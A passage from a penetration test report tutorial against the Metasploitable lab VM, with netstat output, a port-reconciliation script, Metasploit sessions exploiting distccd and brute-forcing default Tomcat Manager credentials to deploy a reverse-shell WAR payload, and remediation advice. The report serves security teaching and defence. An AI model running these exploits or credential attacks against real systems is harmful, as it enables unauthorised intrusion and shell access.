tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
tcp6 0 0 :::3632 :::* LISTEN
tcp6 0 0 :::21 :::* LISTEN
tcp6 0 0 :::53 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::5432 :::* LISTEN
tcp6 0 0 ::1:953 :::* LISTEN
tcp6 0 132 192.168.1.4:22 192.168.1.100:8951 ESTABLISHED
user@metasploitable:~$ netstat -atln | grep 3632
tcp6 0 0 :::3632 :::* LISTEN
user@metasploitable:~$ ps -A | grep distcc
4528 ? 00:00:00 distccd
4529 ? 00:00:00 distccd
4651 ? 00:00:00 distccd
4689 ? 00:00:00 distccd
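Reconciling the local listener inventory against the external scan is a check worth doing on every host where a shell is obtained. The script below, added here as an example and not part of the original report, parses the nmap service list and the netstat -atln output shown above, keeps only the listeners reachable from the network (wildcard binds or the target's own address 10.0.0.3, from the report; loopback-only sockets such as port 953 are excluded) and reports the ports the scan missed. The function names are this example's own.

```python
"""Reconcile the local listening-socket inventory with the external nmap
scan to find services the scan missed.

Added example, not part of the original report. The two inputs are the
nmap service list and the netstat -atln output shown in the report.
"""

# nmap output from the Vulnerability Assessment section above.
NMAP_OUTPUT = """\
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
"""

# netstat -atln output captured on the target, as shown above.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.4:53 0.0.0.0:* LISTEN
tcp 0 0 10.0.0.3:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
tcp6 0 0 :::3632 :::* LISTEN
tcp6 0 0 :::21 :::* LISTEN
tcp6 0 0 :::53 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::5432 :::* LISTEN
tcp6 0 0 ::1:953 :::* LISTEN
tcp6 0 132 192.168.1.4:22 192.168.1.100:8951 ESTABLISHED
"""


def nmap_ports(text):
    """Ports reported open in nmap's 'port/proto state service' lines."""
    ports = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[1] == "open" and "/" in fields[0]:
            ports.add(int(fields[0].split("/", 1)[0]))
    return ports


def reachable_listeners(netstat_text, target_ip):
    """Ports in LISTEN state bound to a wildcard address or to the target's
    own address. Loopback-only sockets (127.0.0.1, ::1) are not remotely
    reachable and are left out."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[-1] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)  # ':::3632' -> ('::', '3632')
        if addr in ("0.0.0.0", "::", target_ip):
            ports.add(int(port))
    return ports


def missed_by_scan(netstat_text, nmap_text, target_ip):
    """Remotely reachable listeners that the nmap run did not report."""
    return sorted(reachable_listeners(netstat_text, target_ip) - nmap_ports(nmap_text))


if __name__ == "__main__":
    print("missed by scan:", missed_by_scan(NETSTAT_OUTPUT, NMAP_OUTPUT, "10.0.0.3"))
```

On the report's data the only gap is port 3632 (distccd), which is exactly what the manual netstat inspection found; port 953 (BIND's rndc control channel) is bound to loopback only and correctly stays out of the list.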

This port is normally used by distcc, a distributed compiler, and the process list confirms that the daemon behind port 3632 is indeed distccd. Note that running distcc -v on the target does not print the distcc version: distcc simply forwards the -v flag to the default compiler, so what follows is the gcc version string:


distcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=c,c++,fortran,objc,obj-c++,treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)

Regardless of the compiler version, the distccd service proved to be vulnerable to CVE-2004-2687 (distcc 2.x runs arbitrary compiler command lines from any client when started without access restrictions):


msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xAyLCX15XTfF2u7t;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xAyLCX15XTfF2u7t\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (10.0.0.4:4444 -> 10.0.0.3:41755) at 2012-04-16 04:50:11 +0300
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

The running Tomcat daemon proved to have weak credentials for the Manager application (the deploy manager):


msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(tomcat_mgr_login) > set THREADS 5
THREADS => 5
msf auxiliary(tomcat_mgr_login) > run
[+] http://10.0.0.3:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The Manager application can then be used to deploy a WAR file carrying a payload and gain another shell:


msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 10.0.0.2:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6215 bytes as MRgShe.war ...
[*] Executing /MRgShe/DhASJ.jsp...
[*] Undeploying MRgShe ...
[*] Sending stage (28597 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:60788) at 2012-04-14 16:10:44 -0400
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

The target machine also has a working gcc compiler. While this is not a vulnerability by itself, it makes running exploits on the target easier: an attacker can compile exploits directly on the machine without needing any file transfer channel.

Post Exploitation

To close the root-access paths demonstrated above, the following measures should be taken:

- patch the Samba daemon.
- patch the udev package.
- don't keep a private key that can access the root account on the same machine. Disabling root login via SSH (PermitRootLogin no in sshd_config) also mitigates any SSH attack against the root user.
- don't grant sudo access to a user with weak credentials, and restrict the sudo rules to the minimum set of commands each user actually needs instead of unrestricted root.

Although the root password itself was not recovered in the time available, its hash was recovered from /etc/shadow. Since it is an MD5-crypt ($1$) hash, which can be attacked offline at high speed, the existing root password should be replaced with a strong one.

To prevent remote shells as unprivileged users, these services must be patched:

- the distcc daemon
- the tikiwiki installation available in /var/www/tikiwiki. The /var/www/tikiwiki-old installation proved to be patched.

All the weak credentials should be replaced with strong credentials:

- the system users: postgres, user, msfadmin, service, klog, sys.
- the root user of the MySQL database server.
- the postgres user of the PostgreSQL database server.
- the tomcat user of the tomcat deploy manager.
- the SSH key pair of the “user” account, which is authorized for msfadmin, and the msfadmin key pair, which is authorized for root: both should be revoked and regenerated.

The web applications should use proper filesystem access control lists instead of being world readable. Also, an unprivileged user should be configured for database access, instead of using MySQL’s root user.

It is recommended to avoid installing a compiler on production machines.

Article written by

Marius is the man with the idea behind Hack a Server, a platform designed for conducting manual penetration tests using the power of crowdsourcing, covered by anonymity and confidentiality. He considers himself a serial entrepreneur and is very passionate about Artificial Intelligence.

8 responses to “HowTo: Penetration test report example [Metasploitable]”

  1. Training Arena

    [...] Except Metasploitable, all the systems/targets that you will find into Training Arena, are built and deployed by users like you and not by the Hack a Server Team. We uploaded Metasploitable to help our users better understand HowTo: Penetration test report example [Metasploitable] [...]

  2. sandeep

    Hey Admin,

    Have a Question. ” How can we Block Port scanning of our linux Server” ?

    U can send me answer on my email id [ sandeep.singh748@gmail.com ] .

    Thanks .

  3. Getting HaS Certificate – Proof that you are a PenTester

    [...] more insights please read our tutorials on HowTo: Complete a penetration test report and HowTo: Penetration test report example [Metasploitable] [...]

  4. Writing a Penetration Testing Report: sample template and guidelines | Night Lion Security Blog

    [...] HowTo: Penetration test report example [...]

  5. Writing a Penetration Testing Report: sample template and guidelines

    [...] HowTo: Penetration test report example [...]

  6. shooter free flashgames

    Hi, Neat post. There’s an issue together with your web site in web explorer, would
    test this? IE nonetheless is the marketplace chief and a good section of people will omit your excellent writing because of this problem.

  7. Krypsys

    Penetration testing is a very effective way of viewing where your weaknesses lie giving you an indication where to improve
